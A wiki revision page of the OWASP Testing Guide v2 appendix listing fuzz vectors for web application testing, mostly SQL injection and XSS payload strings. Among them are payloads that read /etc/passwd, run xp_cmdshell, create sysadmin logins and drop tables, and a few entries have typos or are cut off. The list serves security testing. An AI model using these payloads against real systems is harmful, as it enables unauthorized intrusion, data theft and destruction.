Difference between revisions of "OWASP Testing Guide Appendix C: Fuzz Vectors"

From OWASP
Jump to: navigation, search
m (did some fix on code)
Line 52: Line 52:
 
<nowiki>INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))</nowiki><br>
 
<nowiki>INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))</nowiki><br>
 
<nowiki>CRATE USER name IDENTIFIED BY 'pass123'</nowiki><br>
 
<nowiki>CRATE USER name IDENTIFIED BY 'pass123'</nowiki><br>
<nowiki>CRATEUSER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; </nowiki><br>
+
<nowiki>CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; </nowiki><br>
 
<nowiki>GRANT CONNECT TO name; GRANT RESOURCE TO name;</nowiki><br>
 
<nowiki>GRANT CONNECT TO name; GRANT RESOURCE TO name;</nowiki><br>
 
<nowiki>' union select 1,load_file('/etc/passwd'),1,1,1;</nowiki><br>
 
<nowiki>' union select 1,load_file('/etc/passwd'),1,1,1;</nowiki><br>
Line 77: Line 77:
 
<nowiki><IMG SRC=javascript:alert('XSS')></nowiki><br>
 
<nowiki><IMG SRC=javascript:alert('XSS')></nowiki><br>
 
<nowiki><IMG SRC=JaVaScRiPt:alert('XSS')> </nowiki><br>
 
<nowiki><IMG SRC=JaVaScRiPt:alert('XSS')> </nowiki><br>
<nowiki><IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)></nowiki><br>
+
<nowiki><IMG SRC=JaVaScRiPt:alert(&amp;quot;XSS<WBR>&amp;quot;)></nowiki><br>
<nowiki><IMG SRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41></nowiki><br>
+
<nowiki><IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;<WBR>#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;<WBR>#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;<WBR>#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83<WBR>;&amp;#83;&amp;#39;&amp;#41></nowiki><br>
 
<nowiki><IMG
 
<nowiki><IMG
 
SRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041></nowiki><br>
 
SRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041></nowiki><br>
 
<nowiki><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29></nowiki><br>
 
<nowiki><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29></nowiki><br>
<nowiki><IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');"></nowiki><br>
+
<nowiki><IMG SRC="jav&amp;#x09;ascript:alert(<WBR>'XSS');"></nowiki><br>
<nowiki><IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"></nowiki><br>
+
<nowiki><IMG SRC="jav&amp;#x0A;ascript:alert(<WBR>'XSS');"></nowiki><br>
<nowiki><IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"></nowiki><br>
+
<nowiki><IMG SRC="jav&amp;#x0D;ascript:alert(<WBR>'XSS');"></nowiki><br>
  
  
 
{{Category:OWASP Testing Project AoC}}
 
{{Category:OWASP Testing Project AoC}}

Revision as of 13:55, 16 November 2006

[Up]
OWASP Testing Guide v2 Table of Contents


The following are fuzzing vectors which can be used with webscarab or another fuzzer. Fuzzing is the "kitchen sink" approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing. This is the simple part of the discovery phase. Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required:

' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
>"><script>alert("XSS")</script>&
"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
">
>"
'';!--"<XSS>=&{()}
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+&password=
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Admin' OR '
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
CRATE USER name IDENTIFIED BY 'pass123'
CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
GRANT CONNECT TO name; GRANT RESOURCE TO name;
' union select 1,load_file('/etc/passwd'),1,1,1;
' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing'
' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
'/**/OR/**/1/**/=/**/1
' or 1/*
Password:*/=1--
UNI/**/ON SEL/**/ECT
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
'; EXEC ('SEL' + 'ECT US' + 'ER')
INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
<IMG SRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
<IMG SRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">



OWASP Testing Guide v2

Here is the OWASP Testing Guide v2 Table of Contents